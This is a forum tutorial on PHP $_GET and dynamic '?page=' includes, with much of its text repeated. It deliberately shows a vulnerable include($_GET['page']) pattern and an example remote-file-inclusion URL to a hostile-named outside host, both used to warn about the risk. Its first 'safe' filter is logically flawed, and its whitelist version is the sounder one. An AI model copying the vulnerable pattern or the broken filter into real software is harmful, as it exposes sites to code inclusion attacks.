Bryon
I Fix Things
- Messages
- 8,149
- Reaction score
- 101
- Points
- 48
Introduction: Ever want to learn how to make one of those nifty "?page=pagename" scripts with PHP? This tutorial will explain how to do that, also briefly discussing the security side to it all.
Background:
Ever since PHP version 4.1.0, PHP has superglobal arrays that contain data from different places. They are:
I'm only going to talk about one of the superglobal arrays here, and that is $_GET.
$_GET contains an associative array of all data passed to the PHP script in the URL.
"In the URL", means things such as:
/index.php?word=value&word=value&etc=etc&etc
Or more realistically:
/login.php?username=NedreN&password=Imapassword
Each piece of data you wish to use in your PHP script is usually passed to the script in name=value pairs, for example: "username=NedreN".
So how do think you get the data from the URL? The $_GET superglobal array is the answer.
Every name=value pair in the URL is automatically placed into the array. So say you went to:
/login.php?username=NedreN&password=Imapassword
In the PHP script on login.php, $_GET['username'] would contain the value "NedreN", and $_GET['password'] would contain the value "Imapassword".
Dynamic Includes:
You should know how to use data in the URL on a PHP script. How do you think you could make a "page changer/includer" using something like "?page=pagename" in the URL? I'll tell you how.
The quickest way to do this would be to use PHP's include() construct and just include $_GET['page'] where ever you wish the page to be:
That however is very very unsafe, and you should NEVER use it. I am just putting it on here as an example. What if you had that and someone did something such as:
http://site.com/index.php?page=http://nedren.com/badscript_Imgonna_h4xor_J00.php
Tisk tisk, not good. The page/site/script at http://nedren.com/badscript_Imgonna_h4xor_J00.php could be included into yours, which could contain malicious things. So how do you make a "dynamic page changer" safely? There are many options. I'll show two of them here:
That right there attempts to make sure the value in $_GET['page'] will not be malicious and contain anything that should not be there. It's still not 100% perfect, so I shall also give you this:
Well there you are, you should be able to see how to edit that to your liking and place any pages you want into the array. I have it set up so that it will load pages from the directory /pages and auto-append the ".php" to the end of the page name. Remember that this will only include files in the array, and if the value of $_GET['page'] is not in the array, it will emit an error. Also, if nothing is set in $_GET['page'], it will include /pages/index.php. You can change that as well.
Background:
Ever since PHP version 4.1.0, PHP has superglobal arrays that contain data from different places. They are:
- $_GET - Array of data from the HTTP GET method.
- $_POST - Array of data from the HTTP POST method.
- $_COOKIE - Array of data from cookies stored on the visitors browser.
- $_REQUEST - A collection of all superglobal arrays available to the script run]ning.
- $_SERVER - Array of data containing things like server configuration information, script locations, headers, etc.
- $_ENV - Array of enviromental data.
- $_SESSION - Array of session data.
- $_FILES - Array of items uploaded to the current script.
I'm only going to talk about one of the superglobal arrays here, and that is $_GET.
$_GET contains an associative array of all data passed to the PHP script in the URL.
"In the URL", means things such as:
/index.php?word=value&word=value&etc=etc&etc
Or more realistically:
/login.php?username=NedreN&password=Imapassword
Each piece of data you wish to use in your PHP script is usually passed to the script in name=value pairs, for example: "username=NedreN".
So how do think you get the data from the URL? The $_GET superglobal array is the answer.
Every name=value pair in the URL is automatically placed into the array. So say you went to:
/login.php?username=NedreN&password=Imapassword
In the PHP script on login.php, $_GET['username'] would contain the value "NedreN", and $_GET['password'] would contain the value "Imapassword".
Dynamic Includes:
You should know how to use data in the URL on a PHP script. How do you think you could make a "page changer/includer" using something like "?page=pagename" in the URL? I'll tell you how.
The quickest way to do this would be to use PHP's include() construct and just include $_GET['page'] where ever you wish the page to be:
PHP:
<?php
$page = $_GET['page'];
include($page);
?>That however is very very unsafe, and you should NEVER use it. I am just putting it on here as an example. What if you had that and someone did something such as:
http://site.com/index.php?page=http://nedren.com/badscript_Imgonna_h4xor_J00.php
Tisk tisk, not good. The page/site/script at http://nedren.com/badscript_Imgonna_h4xor_J00.php could be included into yours, which could contain malicious things. So how do you make a "dynamic page changer" safely? There are many options. I'll show two of them here:
PHP:
<?php
// Place the value from ?page=value in the URL to the variable $page.
$page = $_GET['page'];
// Small check to see if URL contains anything bad.
if ((strpos($page, '') == true) OR (strpos($page, '/') == true) OR (strpos($page, '.') == true)) {
echo 'HAHA! You have been caught.';
die();
}
// Include the file "pages/$page.php".
include('pages/'. $page .'.php');
?>That right there attempts to make sure the value in $_GET['page'] will not be malicious and contain anything that should not be there. It's still not 100% perfect, so I shall also give you this:
PHP:
<?php
// Place the value from ?page=value in the URL to the variable $page.
$page = $_GET['page'];
// Create an array of the only pages allowed.
$pageArray = array(
'index',
'page1',
'page2',
'page3',
'page4',
'page5',
'page6'
);
// If there is no page set, include the default main page.
if (!$page) {
include('pages/index.php');
}
// Is $page in the array?
$inArray = in_array($page, $pageArray);
// If so, include it, if not, emit error.
if ($inArray == true) {
include('pages/'. $page .'.php');
} else {
echo 'Umm tisk tisk. You shouldn't be messing with things.';
}
?>Well there you are, you should be able to see how to edit that to your liking and place any pages you want into the array. I have it set up so that it will load pages from the directory /pages and auto-append the ".php" to the end of the page name. Remember that this will only include files in the array, and if the value of $_GET['page'] is not in the array, it will emit an error. Also, if nothing is set in $_GET['page'], it will include /pages/index.php. You can change that as well.
